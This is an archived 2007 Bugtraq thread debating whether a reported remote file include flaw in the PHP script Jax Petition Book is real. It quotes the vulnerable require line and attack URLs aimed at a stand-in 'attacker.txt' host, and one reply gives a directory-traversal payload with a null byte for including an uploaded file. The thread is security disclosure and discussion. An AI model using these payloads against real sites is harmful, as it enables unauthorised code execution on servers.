Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities

To: bmatheny@xxxxxxxxxxxxx
Subject: Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities
From: John McGuire <bugtraq@xxxxxxxxxxxxxxxxxx>
Date: Tue, 16 Jan 2007 11:51:31 -0700
Cc: bugtraq@xxxxxxxxxxxxxxxxx
In-reply-to: <20070115221305.GA3323@beth>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <20070114183049.31666.qmail@xxxxxxxxxxxxxxxxx> <20070115221305.GA3323@beth>
User-agent: Mozilla Thunderbird 1.0.7 (Windows/20050923)

Actually, this can be pretty serious depending on server settings, butan improper example was given.


Better one:

jax_petitionbook.php?languagepack=../../some_other_allowed_file_uploads/myfile.php.gif%00


Many servers will have magic quotes on to defeat the null byte, but by no means 
all.

John



bmatheny@xxxxxxxxxxxxx wrote:

This is not a vulnerability. Since $languagepack is prefixed by "language/",
the PHP stream handler will simply try to open a local file. Also, you can
only modify $languagepack if register_globals is on, which, it rarely is
these days.

Can we stop with the PHP 'vulnerabilities' that aren't?

-Blake

Whatchu talkin' 'bout, Willis?

------------------------------------------------------------------------------------------------------------------

AYYILDIZ.ORG PreSents...


*Script: Jax Petition Book
*Download: jtr.de/scripting/php/guestbook/petitionbook%20v1.0.3.06.zip

*Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

-------------------------------------------------------------------------------------------------------------------

*Code:

require ( "language/" .$languagepack . ".inc.php" );

-------------------------------------------------------------------------------------------------------------------

*Exploit:

jax_petitionbook.php?languagepack=http://attacker.txt?
smileys.php?languagepack=http://attacker.txt?

-------------------------------------------------------------------------------------------------------------------

Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR,Dum?nci
Special Tnx: AYYILDIZ.ORG

References:
- Jax Petition Book (languagepack) Remote File Include Vulnerabilities
  - From: ilkerkandemir
- Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities
  - From: bmatheny

Prev by Date: Re: Gallery <= 1.4.4-pl4 (phpbb_root_path) Remote File Include Vulnerability
Next by Date: Re: Remedy Action Request System 5.01.02 - User Enumeration
Previous by thread: Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities
Next by thread: wcSimple Poll (password.txt) Remote Password Disclosure Vulnerablity
Index(es):
- Date
- Thread